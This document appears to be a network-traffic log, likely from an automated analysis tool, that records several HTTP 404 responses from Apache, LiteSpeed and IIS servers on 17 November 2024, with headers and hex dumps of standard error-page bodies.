            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:36:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:36:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:36:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 17 Nov 2024 07:36:45 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 
c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 17 Nov 2024 07:36:48 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 
c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 17 Nov 2024 07:36:50 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 
c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Sun, 17 Nov 2024 07:36:53 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 
20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 17 Nov 2024 07:37:12 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 
20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 